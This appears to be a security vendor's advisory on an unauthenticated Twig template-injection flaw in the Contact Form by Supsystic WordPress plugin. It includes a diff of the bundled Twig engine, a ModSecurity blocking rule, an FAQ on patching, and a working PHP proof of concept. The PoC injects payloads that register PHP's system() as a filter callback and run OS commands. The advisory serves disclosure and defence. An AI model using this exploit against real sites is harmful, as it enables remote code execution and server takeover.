-    public function setLexer(Twig_LexerInterface $lexer)
-    {
-        $this->lexer = $lexer;
-    }
-
-    /**
-     * Tokenizes a source code.
-     *
-     * @param string $source The template source code
-     * @param string $name   The template name
-     *
-     * @return Twig_TokenStream A Twig_TokenStream instance
-     *
-     * @throws Twig_Error_Syntax When the code is syntactically wrong
-     */
-    public function tokenize($source, $name = null)
-    {
-        return $this->getLexer()->tokenize($source, $name);
-    }
-
-    /**
-     * Gets the Parser instance.
-     *
-     * @return Twig_ParserInterface A Twig_ParserInterface instance
-     */
-    public function getParser()
-    {
-        if (null === $this->parser) {
-            $this->parser = new Twig_Parser($this);
-        }
-
-        return $this->parser;
-    }
-
-    /**
-     * Sets the Parser instance.
-     *
-     * @param Twig_ParserInterface A Twig_ParserInterface instance
-     */
-    public function setParser(Twig_ParserInterface $parser)
-    {
-        $this->parser = $parser;
-    }
-
-    /**
-     * Converts a token stream to a node tree.
-     *
-     * @param Twig_TokenStream $stream A token stream instance
-     *
-     * @return Twig_Node_Module A node tree
-     *
-     * @throws Twig_Error_Syntax When the token stream is syntactically or semantically wrong
-     */
-    public function parse(Twig_TokenStream $stream)
-    {
-        return $this->getParser()->parse($stream);
-    }
-
-    /**
-     * Gets the Compiler instance.
-     *
-     * @return Twig_CompilerInterface A Twig_CompilerInterface instance
-     */
-    public function getCompiler()
-    {
-        if (null === $this->compiler) {
-            $this->compiler = new Twig_Compiler($this);
-        }
-
-        return $this->compiler;
-    }
-
-    /**
-     * Sets the Compiler instance.
-     *
-     * @param Twig_CompilerInterface $compiler A Twig_CompilerInterface instance
-     */
-    public function setCompiler(Twig_CompilerInterface $compiler)
-    {
-        $this->compiler = $compiler;
-    }
-
-    /**
-     * Compiles a node and returns the PHP code.
-     *
-     * @param Twig_NodeInterface $node A Twig_NodeInterface instance
-     *
-     * @return string The compiled PHP source code
-     */
-    public function compile(Twig_NodeInterface $node)
-    {
-        return $this->getCompiler()->compile($node)->getSource();
-    }
-
-    /**
-     * Compiles a template source code.
-     *
-     * @param string $source The template source code
-     * @param string $name   The template name
-     *
-     * @return string The compiled PHP source code
-     *
-     * @throws Twig_Error_Syntax When there was an error during tokenizing, parsing or compiling
-     */
-    public function compileSource($source, $name = null)
-    {
-        try {
-            return $this->compile($this->parse($this->tokenize($source, $name)));
-        } catch (Twig_Error $e) {
-            $e->setTemplateFile($name);
-            throw $e;
-        } catch (Exception $e) {
-            throw new Twig_Error_Syntax(sprintf('An exception has been thrown during the compilation of a template ("%s").', $e->getMessage()), -1, $name, $e);
-        }
-    }
-
-    /**
-     * Sets the Loader instance.
-     *
-     * @param Twig_LoaderInterface $loader A Twig_LoaderInterface instance
-     */
-    public function setLoader(Twig_LoaderInterface $loader)
-    {
-        $this->loader = $loader;
-    }
-
-    /**
-     * Gets the Loader instance.
-     *
-     * @return Twig_LoaderInterface A Twig_LoaderInterface instance
-     */
-    public function getLoader()
-    {
-        if (null === $this->loader) {
-            throw new LogicException('You must set a loader first.');
-        }
-
-        return $this->loader;
-    }
-
-    /**
-     * Sets the default template charset.
-     *
-     * @param string $charset The default charset
-     */
-    public function setCharset($charset)
-    {
-        $this->charset = strtoupper($charset);
-    }
-
-    /**
-     * Gets the default template charset.
-     *
-     * @return string The default charset
-     */
-    public function getCharset()
-    {
-        return $this->charset;
-    }
-
-    /**
-     * Initializes the runtime environment.
-     */
-    public function initRuntime()
-    {
-        $this->runtimeInitialized = true;
-
-        foreach ($this->getExtensions() as $extension) {
-            $extension->initRuntime($this);
-        }
-    }
-
-    /**
-     * Returns true if the given extension is registered.
-     *
-     * @param string $name The extension name
-     *
-     * @return bool    Whether the extension is registered or not
-     */
-    public function hasExtension($name)
-    {
-        return isset($this->extensions[$name]);
-    }
-
-    /**
-     * Gets an extension by name.
-     *
-     * @param string $name The extension name
-     *
-     * @return Twig_ExtensionInterface A Twig_ExtensionInterface instance
-     */
-    public function getExtension($name)
-    {
-        if (!isset($this->extensions[$name])) {
-            throw new Twig_Error_Runtime(sprintf('The "%s" extension is not enabled.', $name));
-        }
-
-        return $this->extensions[$name];
-    }
-
-    /**
-     * Registers an extension.
-     *
-     * @param Twig_ExtensionInterface $extension A Twig_ExtensionInterface instance
-     */
-    public function addExtension(Twig_ExtensionInterface $extension)
-    {
-        if ($this->extensionInitialized) {
-            throw new LogicException(sprintf('Unable to register extension "%s" as extensions have already been initialized.', $extension->getName()));
-        }
-
-        $this->extensions[$extension->getName()] = $extension;
-    }
-
-    /**
-     * Removes an extension by name.
-     *
-     * This method is deprecated and you should not use it.
-     *
-     * @param string $name The extension name
-     *
-     * @deprecated since 1.12 (to be removed in 2.0)
-     */
-    public function removeExtension($name)
-    {
-        if ($this->extensionInitialized) {
-            throw new LogicException(sprintf('Unable to remove extension "%s" as extensions have already been initialized.', $name));
-        }
-
-        unset($this->extensions[$name]);
-    }
-
-    /**
-     * Registers an array of extensions.
-     *
-     * @param array $extensions An array of extensions
-     */
-    public function setExtensions(array $extensions)
-    {
-        foreach ($extensions as $extension) {
-            $this->addExtension($extension);
-        }
-    }
-
-    /**
-     * Returns all registered extensions.
-     *
-     * @return array An array of extensions
-     */
-    public function getExtensions()
-    {
-        return $this->extensions;
-    }
-
-    /**
-     * Registers a Token Parser.
-     *
-     * @param Twig_TokenParserInterface $parser A Twig_TokenParserInterface instance
-     */
-    public function addTokenParser(Twig_TokenParserInterface $parser)
-    {
-        if ($this->extensionInitialized) {
-            throw new LogicException('Unable to add a token parser as extensions have already been initialized.');
-        }
-
-        $this->staging->addTokenParser($parser);
-    }
-
-    /**
-     * Gets the registered Token Parsers.
-     *
-     * @return Twig_TokenParserBrokerInterface A broker containing token parsers
-     */
-    public function getTokenParsers()
-    {
-        if (!$this->extensionInitialized) {
-            $this->initExtensions();
-        }
-
-        return $this->parsers;
-    }
-
-    /**
-     * Gets registered tags.
-     *
-     * Be warned that this method cannot return tags defined by Twig_TokenParserBrokerInterface classes.
-     *
-     * @return Twig_TokenParserInterface[] An array of Twig_TokenParserInterface instances
-     */
-    public function getTags()
-    {
-        $tags = array();
-        foreach ($this->getTokenParsers()->getParsers() as $parser) {
-            if ($parser instanceof Twig_TokenParserInterface) {
-                $tags[$parser->getTag()] = $parser;
-            }
-        }
-
-        return $tags;
-    }
-
-    /**
-     * Registers a Node Visitor.
-     *
-     * @param Twig_NodeVisitorInterface $visitor A Twig_NodeVisitorInterface instance
-     */
-    public function addNodeVisitor(Twig_NodeVisitorInterface $visitor)
-    {
-        if ($this->extensionInitialized) {
-            throw new LogicException('Unable to add a node visitor as extensions have already been initialized.');
-        }
-
-        $this->staging->addNodeVisitor($visitor);
-    }
-
-    /**
-     * Gets the registered Node Visitors.
-     *
-     * @return Twig_NodeVisitorInterface[] An array of Twig_NodeVisitorInterface instances
-     */
-    public function getNodeVisitors()
-    {
-        if (!$this->extensionInitialized) {
-            $this->initExtensions();
-        }
-
-        return $this->visitors;
-    }
-
-    /**
-     * Registers a Filter.
-     *
-     * @param string|Twig_SimpleFilter               $name   The filter name or a Twig_SimpleFilter instance
-     * @param Twig_FilterInterface|Twig_SimpleFilter $filter A Twig_FilterInterface instance or a Twig_SimpleFilter instance
-     */
-    public function addFilter($name, $filter = null)
-    {
-        if (!$name instanceof Twig_SimpleFilter && !($filter instanceof Twig_SimpleFilter || $filter instanceof Twig_FilterInterface)) {
-            throw new LogicException('A filter must be an instance of Twig_FilterInterface or Twig_SimpleFilter');
-        }
-
-        if ($name instanceof Twig_SimpleFilter) {
-            $filter = $name;
-            $name = $filter->getName();
-        }
-
-        if ($this->extensionInitialized) {
-            throw new LogicException(sprintf('Unable to add filter "%s" as extensions have already been initialized.', $name));
-        }
-
-        $this->staging->addFilter($name, $filter);
-    }
-
-    /**
-     * Get a filter by name.
-     *
-     * Subclasses may override this method and load filters differently;
-     * so no list of filters is available.
-     *
-     * @param string $name The filter name
-     *
-     * @return Twig_Filter|false A Twig_Filter instance or false if the filter does not exist
-     */
-    public function getFilter($name)
-    {
-        if (!$this->extensionInitialized) {
-            $this->initExtensions();
-        }
-
-        if (isset($this->filters[$name])) {
-            return $this->filters[$name];
-        }
-
-        foreach ($this->filters as $pattern => $filter) {
-            $pattern = str_replace('\*', '(.*?)', preg_quote($pattern, '#'), $count);
-
-            if ($count) {
-                if (preg_match('#^'.$pattern.'$#', $name, $matches)) {
-                    array_shift($matches);
-                    $filter->setArguments($matches);
-
-                    return $filter;
-                }
-            }
-        }
-
-        foreach ($this->filterCallbacks as $callback) {
-            if (false !== $filter = call_user_func($callback, $name)) {
-                return $filter;
-            }
-        }
-
-        return false;
-    }
-
-    public function registerUndefinedFilterCallback($callable)
-    {
-        $this->filterCallbacks[] = $callable;
-    }
-
-    /**
-     * Gets the registered Filters.
-     *
-     * Be warned that this method cannot return filters defined with registerUndefinedFunctionCallback.
-     *
-     * @return Twig_FilterInterface[] An array of Twig_FilterInterface instances
-     *
-     * @see registerUndefinedFilterCallback
-     */
-    public function getFilters()
-    {
-        if (!$this->extensionInitialized) {
-            $this->initExtensions();
-        }
-
-        return $this->filters;
-    }
-
-    /**
-     * Registers a Test.
-     *
-     * @param string|Twig_SimpleTest             $name The test name or a Twig_SimpleTest instance
-     * @param Twig_TestInterface|Twig_SimpleTest $test A Twig_TestInterface instance or a Twig_SimpleTest instance
-     */
-    public function addTest($name, $test = null)
-    {
-        if (!$name instanceof Twig_SimpleTest && !($test instanceof Twig_SimpleTest || $test instanceof Twig_TestInterface)) {
-            throw new LogicException('A test must be an instance of Twig_TestInterface or Twig_SimpleTest');
-        }
-
-        if ($name instanceof Twig_SimpleTest) {
-            $test = $name;
-            $name = $test->getName();
-        }
-
-        if ($this->extensionInitialized) {
-            throw new LogicException(sprintf('Unable to add test "%s" as extensions have already been initialized.', $name));
-        }
-
-        $this->staging->addTest($name, $test);
-    }
-
-    /**
-     * Gets the registered Tests.
-     *
-     * @return Twig_TestInterface[] An array of Twig_TestInterface instances
-     */
-    public function getTests()
-    {
-        if (!$this->extensionInitialized) {
-            $this->initExtensions();
-        }
-
-        return $this->tests;
-    }
-
-    /**
-     * Gets a test by name.
-     *
-     * @param string $name The test name
-     *
-     * @return Twig_Test|false A Twig_Test instance or false if the test does not exist
-     */
-    public function getTest($name)
-    {
-        if (!$this->extensionInitialized) {
-            $this->initExtensions();
-        }
-
-        if (isset($this->tests[$name])) {
-            return $this->tests[$name];
-        }
+  const VERSION = '1.16.0';

+  protected $charset;
+  protected $loader;
+  protected $debug;
+  protected $autoReload;
+  protected $cache;
+  protected $lexer;
+  protected $parser;
+  protected $compiler;
+  protected $baseTemplateClass;
+  protected $extensions;
+  protected $parsers;
+  protected $visitors;
+  protected $filters;
+  protected $tests;
+  protected $functions;
+  protected $globals;
+  protected $runtimeInitialized;
+  protected $extensionInitialized;
+  protected $loadedTemplates;
+  protected $strictVariables;
+  protected $unaryOperators;
+  protected $binaryOperators;
+  protected $templateClassPrefix = '__TwigTemplate_';
+  protected $functionCallbacks;
+  protected $filterCallbacks;
+  protected $staging;
+
+  /**
+   * Constructor.
+   *
+   * Available options:
+   *
+   *  * debug: When set to true, it automatically set "auto_reload" to true as
+   *           well (default to false).
+   *
+   *  * charset: The charset used by the templates (default to UTF-8).
+   *
+   *  * base_template_class: The base template class to use for generated
+   *                         templates (default to Twig_Template).
+   *
+   *  * cache: An absolute path where to store the compiled templates, or
+   *           false to disable compilation cache (default).
+   *
+   *  * auto_reload: Whether to reload the template if the original source changed.
+   *                 If you don't provide the auto_reload option, it will be
+   *                 determined automatically based on the debug value.
+   *
+   *  * strict_variables: Whether to ignore invalid variables in templates
+   *                      (default to false).
+   *
+   *  * autoescape: Whether to enable auto-escaping (default to html):
+   *                  * false: disable auto-escaping
+   *                  * true: equivalent to html
+   *                  * html, js: set the autoescaping to one of the supported strategies
+   *                  * PHP callback: a PHP callback that returns an escaping strategy based on the template "filename"
+   *
+   *  * optimizations: A flag that indicates which optimizations to apply
+   *                   (default to -1 which means that all optimizations are enabled;
+   *                   set it to 0 to disable).
+   *
+   * @param Twig_LoaderInterface $loader  A Twig_LoaderInterface instance
+   * @param array                $options An array of options
+   */
+  public function __construct(Twig_LoaderInterface $loader = null, $options = [])
+  {
+    if (null !== $loader) {
+      $this->setLoader($loader);
+    }
+
+    $options = array_merge(
+      [
+        'debug' => false,
+        'charset' => 'UTF-8',
+        'base_template_class' => 'Twig_Template',
+        'strict_variables' => false,
+        'autoescape' => 'html',
+        'cache' => false,
+        'auto_reload' => null,
+        'optimizations' => -1,
+      ],
+      $options,
+    );
+
+    $this->debug = (bool) $options['debug'];
+    $this->charset = strtoupper($options['charset']);
+    $this->baseTemplateClass = $options['base_template_class'];
+    $this->autoReload = null === $options['auto_reload'] ? $this->debug : (bool) $options['auto_reload'];
+    $this->strictVariables = (bool) $options['strict_variables'];
+    $this->runtimeInitialized = false;
+    $this->setCache($options['cache']);
+    $this->functionCallbacks = [];
+    $this->filterCallbacks = [];
+
+    $this->addExtension(new Twig_Extension_Core());
+    $this->addExtension(new Twig_Extension_Escaper($options['autoescape']));
+    $this->addExtension(new Twig_Extension_Optimizer($options['optimizations']));
+    $this->extensionInitialized = false;
+    $this->staging = new Twig_Extension_Staging();
+  }
+
+  /**
+   * Gets the base template class for compiled templates.
+   *
+   * @return string The base template class name
+   */
+  public function getBaseTemplateClass()
+  {
+    return $this->baseTemplateClass;
+  }
+
+  /**
+   * Sets the base template class for compiled templates.
+   *
+   * @param string $class The base template class name
+   */
+  public function setBaseTemplateClass($class)
+  {
+    $this->baseTemplateClass = $class;
+  }
+
+  /**
+   * Enables debugging mode.
+   */
+  public function enableDebug()
+  {
+    $this->debug = true;
+  }
+
+  /**
+   * Disables debugging mode.
+   */
+  public function disableDebug()
+  {
+    $this->debug = false;
+  }
+
+  /**
+   * Checks if debug mode is enabled.
+   *
+   * @return bool    true if debug mode is enabled, false otherwise
+   */
+  public function isDebug()
+  {
+    return $this->debug;
+  }
+
+  /**
+   * Enables the auto_reload option.
+   */
+  public function enableAutoReload()
+  {
+    $this->autoReload = true;
+  }
+
+  /**
+   * Disables the auto_reload option.
+   */
+  public function disableAutoReload()
+  {
+    $this->autoReload = false;
+  }
+
+  /**
+   * Checks if the auto_reload option is enabled.
+   *
+   * @return bool    true if auto_reload is enabled, false otherwise
+   */
+  public function isAutoReload()
+  {
+    return $this->autoReload;
+  }
+
+  /**
+   * Enables the strict_variables option.
+   */
+  public function enableStrictVariables()
+  {
+    $this->strictVariables = true;
+  }
+
+  /**
+   * Disables the strict_variables option.
+   */
+  public function disableStrictVariables()
+  {
+    $this->strictVariables = false;
+  }
+
+  /**
+   * Checks if the strict_variables option is enabled.
+   *
+   * @return bool    true if strict_variables is enabled, false otherwise
+   */
+  public function isStrictVariables()
+  {
+    return $this->strictVariables;
+  }
+
+  /**
+   * Gets the cache directory or false if cache is disabled.
+   *
+   * @return string|false
+   */
+  public function getCache()
+  {
+    return $this->cache;
+  }
+
+  /**
+   * Sets the cache directory or false if cache is disabled.
+   *
+   * @param string|false $cache The absolute path to the compiled templates,
+   *                            or false to disable cache
+   */
+  public function setCache($cache)
+  {
+    $this->cache = $cache ? $cache : false;
+  }
+
+  /**
+   * Gets the cache filename for a given template.
+   *
+   * @param string $name The template name
+   *
+   * @return string|false The cache file name or false when caching is disabled
+   */
+  public function getCacheFilename($name)
+  {
+    if (false === $this->cache) {
+      return false;
+    }
+
+    $class = substr($this->getTemplateClass($name), strlen($this->templateClassPrefix));
+
+    return $this->getCache() . '/' . substr($class, 0, 2) . '/' . substr($class, 2, 2) . '/' . substr($class, 4) . '.php';
+  }
+
+  /**
+   * Gets the template class associated with the given string.
+   *
+   * @param string  $name  The name for which to calculate the template class name
+   * @param int     $index The index if it is an embedded template
+   *
+   * @return string The template class name
+   */
+  public function getTemplateClass($name, $index = null)
+  {
+    return $this->templateClassPrefix . hash('sha256', $this->getLoader()->getCacheKey($name)) . (null === $index ? '' : '_' . $index);
+  }
+
+  /**
+   * Gets the template class prefix.
+   *
+   * @return string The template class prefix
+   */
+  public function getTemplateClassPrefix()
+  {
+    return $this->templateClassPrefix;
+  }
+
+  /**
+   * Renders a template.
+   *
+   * @param string $name    The template name
+   * @param array  $context An array of parameters to pass to the template
+   *
+   * @return string The rendered template
+   *
+   * @throws Twig_Error_Loader  When the template cannot be found
+   * @throws Twig_Error_Syntax  When an error occurred during compilation
+   * @throws Twig_Error_Runtime When an error occurred during rendering
+   */
+  public function render($name, array $context = [])
+  {
+    return $this->loadTemplate($name)->render($context);
+  }
+
+  /**
+   * Displays a template.
+   *
+   * @param string $name    The template name
+   * @param array  $context An array of parameters to pass to the template
+   *
+   * @throws Twig_Error_Loader  When the template cannot be found
+   * @throws Twig_Error_Syntax  When an error occurred during compilation
+   * @throws Twig_Error_Runtime When an error occurred during rendering
+   */
+  public function display($name, array $context = [])
+  {
+    $this->loadTemplate($name)->display($context);
+  }
+
+  /**
+   * Loads a template by name.
+   *
+   * @param string  $name  The template name
+   * @param int     $index The index if it is an embedded template
+   *
+   * @return Twig_TemplateInterface A template instance representing the given template name
+   *
+   * @throws Twig_Error_Loader When the template cannot be found
+   * @throws Twig_Error_Syntax When an error occurred during compilation
+   */
+  public function loadTemplate($name, $index = null)
+  {
+    $cls = $this->getTemplateClass($name, $index);
+
+    if (isset($this->loadedTemplates[$cls])) {
+      return $this->loadedTemplates[$cls];
+    }
+
+    if (!class_exists($cls, false)) {
+      if (false === ($cache = $this->getCacheFilename($name))) {
+        eval('?>' . $this->compileSource($this->getLoader()->getSource($name), $name));
+      } else {
+        if (!is_file($cache) || ($this->isAutoReload() && !$this->isTemplateFresh($name, filemtime($cache)))) {
+          $this->writeCacheFile($cache, $this->compileSource($this->getLoader()->getSource($name), $name));
+        }
+
+        require_once $cache;
+      }
+    }
+
+    if (!$this->runtimeInitialized) {
+      $this->initRuntime();
+    }
+
+    return $this->loadedTemplates[$cls] = new $cls($this);
+  }
+
+  /**
+   * Returns true if the template is still fresh.
+   *
+   * Besides checking the loader for freshness information,
+   * this method also checks if the enabled extensions have
+   * not changed.
+   *
+   * @param string    $name The template name
+   * @param timestamp $time The last modification time of the cached template
+   *
+   * @return bool    true if the template is fresh, false otherwise
+   */
+  public function isTemplateFresh($name, $time)
+  {
+    foreach ($this->extensions as $extension) {
+      $r = new ReflectionObject($extension);
+      if (filemtime($r->getFileName()) > $time) {
         return false;
+      }
     }

-    /**
-     * Registers a Function.
-     *
-     * @param string|Twig_SimpleFunction                 $name     The function name or a Twig_SimpleFunction instance
-     * @param Twig_FunctionInterface|Twig_SimpleFunction $function A Twig_FunctionInterface instance or a Twig_SimpleFunction instance
-     */
-    public function addFunction($name, $function = null)
-    {
-        if (!$name instanceof Twig_SimpleFunction && !($function instanceof Twig_SimpleFunction || $function instanceof Twig_FunctionInterface)) {
-            throw new LogicException('A function must be an instance of Twig_FunctionInterface or Twig_SimpleFunction');
-        }
-
-        if ($name instanceof Twig_SimpleFunction) {
-            $function = $name;
-            $name = $function->getName();
-        }
+    return $this->getLoader()->isFresh($name, $time);
+  }

-        if ($this->extensionInitialized) {
-            throw new LogicException(sprintf('Unable to add function "%s" as extensions have already been initialized.', $name));
-        }
-
-        $this->staging->addFunction($name, $function);
-    }
+  /**
+   * Tries to load a template consecutively from an array.
+   *
+   * Similar to loadTemplate() but it also accepts Twig_TemplateInterface instances and an array
+   * of templates where each is tried to be loaded.
+   *
+   * @param string|Twig_Template|array $names A template or an array of templates to try consecutively
+   *
+   * @return Twig_Template
+   *
+   * @throws Twig_Error_Loader When none of the templates can be found
+   * @throws Twig_Error_Syntax When an error occurred during compilation
+   */
+  public function resolveTemplate($names)
+  {
+    if (!is_array($names)) {
+      $names = [$names];
+    }
+
+    foreach ($names as $name) {
+      if ($name instanceof Twig_Template) {
+        return $name;
+      }
+
+      try {
+        return $this->loadTemplate($name);
+      } catch (Twig_Error_Loader $e) {
+      }
+    }
+
+    if (1 === count($names)) {
+      throw $e;
+    }
+
+    throw new Twig_Error_Loader(sprintf('Unable to find one of the following templates: "%s".', implode('", "', $names)));
+  }
+
+  /**
+   * Clears the internal template cache.
+   */
+  public function clearTemplateCache()
+  {
+    $this->loadedTemplates = [];
+  }
+
+  /**
+   * Clears the template cache files on the filesystem.
+   */
+  public function clearCacheFiles()
+  {
+    if (false === $this->cache) {
+      return;
+    }
+
+    foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator($this->cache), RecursiveIteratorIterator::LEAVES_ONLY) as $file) {
+      if ($file->isFile()) {
+        @unlink($file->getPathname());
+      }
+    }
+  }
+
+  /**
+   * Gets the Lexer instance.
+   *
+   * @return Twig_LexerInterface A Twig_LexerInterface instance
+   */
+  public function getLexer()
+  {
+    if (null === $this->lexer) {
+      $this->lexer = new Twig_Lexer($this);
+    }
+
+    return $this->lexer;
+  }
+
+  /**
+   * Sets the Lexer instance.
+   *
+   * @param Twig_LexerInterface A Twig_LexerInterface instance
+   */
+  public function setLexer(Twig_LexerInterface $lexer)
+  {
+    $this->lexer = $lexer;
+  }
+
+  /**
+   * Tokenizes a source code.
+   *
+   * @param string $source The template source code
+   * @param string $name   The template name
+   *
+   * @return Twig_TokenStream A Twig_TokenStream instance
+   *
+   * @throws Twig_Error_Syntax When the code is syntactically wrong
+   */
+  public function tokenize($source, $name = null)
+  {
+    return $this->getLexer()->tokenize($source, $name);
+  }
+
+  /**
+   * Gets the Parser instance.
+   *
+   * @return Twig_ParserInterface A Twig_ParserInterface instance
+   */
+  public function getParser()
+  {
+    if (null === $this->parser) {
+      $this->parser = new Twig_Parser($this);
+    }
+
+    return $this->par

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-4257
# Blocks SSTI exploitation via Contact Form by Supsystic prefill functionality
# Targets unauthenticated GET requests with Twig expressions in cfs_ parameters
SecRule REQUEST_URI "@rx ^/(?:index.php)?$" 
  "id:10004257,phase:2,deny,status:403,chain,msg:'CVE-2026-4257: Contact Form by Supsystic SSTI/RCE via prefill',severity:'CRITICAL',tag:'CVE-2026-4257',tag:'WordPress',tag:'Plugin/Contact-Form-by-Supsystic',tag:'Attack/RCE',tag:'OWASP_TOP10/A1',tag:'WASCTC/WASC-18',tag:'PCI/6.5.1'"
  SecRule &ARGS_GET:"@beginsWith cfs_" "@gt 0" "chain"
    SecRule ARGS_GET:"@beginsWith cfs_" "@rx {{[^}]*}}" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-4257 - Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection via Prefill Functionality

<?php

$target_url = "http://vulnerable-site.com/"; // Change this to the target WordPress site URL

// Step 1: Identify a page with a Contact Form by Supsystic form
// The form can be on any page (homepage, contact page, etc.)
// This PoC assumes we're targeting the homepage
$attack_url = $target_url;

// Step 2: Craft the SSTI payload to execute OS commands
// First, register a callback to the PHP system() function
$payload_register = '{{_self.env.registerUndefinedFilterCallback("system")}}';
// Then, call the registered filter with our command
$payload_execute = '{{_self.env.getFilter("id")}}';

// Step 3: Construct the full exploit URL with GET parameters
// The plugin expects parameters in the format ?cfs_[field_name]=[value]
// We can use any field name that exists in the form
$exploit_url = $attack_url . "?cfs_name=" . urlencode($payload_register) . "&cfs_email=" . urlencode($payload_execute);

// Step 4: Execute the attack using cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Atomic Edge Research)');

// Step 5: Send the request and capture response
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 6: Parse the response for command output
// The command output will be embedded in the HTML response
// Look for the result of the 'id' command
if ($http_code == 200) {
    echo "[+] Attack sent successfully to: $exploit_urln";
    echo "[+] Searching for command output in response...n";
    
    // Extract content between the Twig expression markers
    // The output will appear where the form field value is rendered
    if (preg_match('/uid=d+([^)]+) gid=d+([^)]+) groups=d+([^)]+)/', $response, $matches)) {
        echo "[+] SUCCESS: Command executed! Output found:n";
        echo "    " . $matches[0] . "n";
        echo "[+] This confirms Remote Code Execution vulnerability.n";
    } else {
        echo "[-] Command output not found in response.n";
        echo "[-] Possible reasons: Form not present, plugin not active, or site already patched.n";
        echo "[-] Raw response (first 2000 chars):n" . substr($response, 0, 2000) . "n";
    }
} else {
    echo "[-] HTTP request failed with code: $http_coden";
}

// Note: This PoC demonstrates the vulnerability by executing the 'id' command
// Ethical use only: Test only on systems you own or have explicit permission to test
?>

Frequently Asked Questions

What is CVE-2026-4257?
Understanding the vulnerability
CVE-2026-4257 is a critical vulnerability in the Contact Form by Supsystic plugin for WordPress, allowing unauthenticated Server-Side Template Injection (SSTI) that can lead to Remote Code Execution (RCE). This occurs due to improper handling of user input in the prefill functionality, enabling attackers to inject malicious Twig expressions.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exploits the `cfsPreFill` function, which processes GET parameters without proper sanitization. Attackers can append Twig expressions to form field values via GET requests, allowing them to execute arbitrary PHP functions and OS commands on the server.
Who is affected by this vulnerability?
Identifying at-risk installations
Any WordPress site using the Contact Form by Supsystic plugin version 1.7.36 or earlier is affected by this vulnerability. Administrators should check their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, navigate to the WordPress admin dashboard, go to the ‘Plugins’ section, and look for the Contact Form by Supsystic plugin. If the version is 1.7.36 or lower, your site is vulnerable.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 1.8.0 of the Contact Form by Supsystic plugin. To fix the issue, update the plugin to the latest version via the WordPress admin dashboard or download it from the official repository.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the plugin until it can be updated. Additionally, implement web application firewalls or security plugins that can help block malicious requests targeting this vulnerability.
What does a CVSS score of 9.8 indicate?
Understanding severity ratings
A CVSS score of 9.8 indicates a critical vulnerability, meaning that it poses a significant risk to the security of affected systems. Exploitation can lead to complete server compromise, allowing attackers to execute arbitrary code.
What are the practical risks of this vulnerability?
Potential impact on affected sites
Exploitation of this vulnerability can lead to remote code execution, allowing attackers to read, modify, or delete files on the server, access databases, and potentially gain control over the entire server environment.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept outlines how an attacker can exploit the vulnerability by crafting a URL with GET parameters that include malicious Twig expressions. This demonstrates the ease of executing OS commands without authentication, highlighting the severity of the issue.
What should I do if I suspect my site has been compromised?
Responding to potential breaches
If you suspect that your site has been compromised due to this vulnerability, immediately take the site offline, investigate the breach, and restore from a clean backup. Review logs for unauthorized access and consider consulting with a security professional.
Are there any other security measures I should take?
Enhancing overall security
In addition to updating vulnerable plugins, regularly review and update all WordPress components, utilize strong passwords, implement two-factor authentication, and conduct regular security audits to enhance your site’s overall security posture.
How can I stay informed about future vulnerabilities?
Monitoring security updates
To stay informed about future vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the Common Vulnerabilities and Exposures (CVE) database for updates relevant to your installed plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations